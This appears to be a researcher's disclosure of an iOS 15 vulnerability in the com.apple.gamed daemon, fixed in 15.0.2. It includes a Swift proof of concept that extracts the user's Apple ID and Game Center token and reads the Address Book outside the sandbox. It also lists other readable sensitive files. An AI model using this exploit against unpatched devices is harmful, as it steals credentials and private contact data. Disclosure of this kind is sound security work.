iOS gamed exploit (fixed in 15.0.2)
Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.
Any app installed from the App Store may access the following data without any prompt from the user:
Here is a short proof of concept.
let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
let appleID = response.credential.accountName
let token = response.credential.authenticationToken
}
utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
let addressBookData = data
}
}
How it happens:
com.apple.gamed
doesn't properly check for com.apple.developer.game-center
entitlementgetServicesForPID:localPlayer:reply:
returns several XPC proxy objects (GKAccountService
, GKFriendService
, GKUtilityService
, etc.).com.apple.developer.game-center
entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler:
on GKAccountService
returns an object containing Apple ID of the user, DSID and Game Center authentication token (which allows to send requests to https://gc.apple.com
on behalf of the user). Invoking getProfilesForPlayerIDs:handler:
on GKProfileService returns an object containing first and last name of the user's Apple ID. Invoking getFriendsForPlayer:handler:
on GKFriendService
return an object with information about user's friend in Game Center.com.apple.developer.game-center
entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler:
on GKUtilityService
allows to read arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files (but not limited to) that can be accessed that way are the following:
/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist
- contains mobile gestalt cache
/var/mobile/Library/CoreDuet/People/interactionC.db
- contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about user's interaction with these contacts (including timestamps and statistics)
/var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist
- contains favorite contacts and their phone numbers
/var/mobile/Library/AddressBook/AddressBook.sqlitedb
- contains complete Address Book database
/var/mobile/Library/AddressBook/AddressBookImages.sqlitedb
- contains photos of Address book contactscacheImageData:inSubdirectory:withFileName:handler:
on GKUtilityService might allow to write arbitrary data to a location outside of the app sandbox.On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).